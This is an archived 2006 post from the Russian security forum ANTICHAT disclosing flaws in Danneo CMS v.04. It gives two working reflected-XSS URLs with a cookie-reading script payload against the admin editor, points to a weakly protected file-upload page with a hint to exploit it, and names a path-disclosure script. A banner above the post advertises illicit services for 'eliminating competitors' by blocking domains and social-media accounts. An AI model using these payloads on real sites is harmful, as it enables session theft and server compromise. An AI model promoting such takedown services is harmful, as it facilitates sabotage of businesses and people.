УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Многочисленные уязвимости Danneo CMS

Опции темы

Поиск в этой теме

Опции просмотра

Многочисленные уязвимости Danneo CMS

22.04.2006, 09:12

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

Провел на форуме:
3212607

Репутация: 454

Многочисленные уязвимости Danneo CMS

DanneoCMS v.04
_http://danneo.com

1. xxs - куки

http://danneosite.com/apanel/editor/img_popup.php?img_url=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E

http://danneosite.com/apanel/editor/file_popup.php?img_url=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E

2. заливка файлов

http://danneosite.com/apanel/editor/...mg_library.php

защита слабенькая:

http://danneosite.com/apanel/editor/...rol.config.php -->

PHP код:


		
			
// allowed extentions for uploaded image files

$spaw_valid_imgs = array('gif', 'jpg', 'jpeg', 'png');

думайте сами =))

3. раскрытие путей

их много, самое простейшее:

http://danneosite.com/apanel/editor/scripts/demo.php

Antichat.ru © VectorG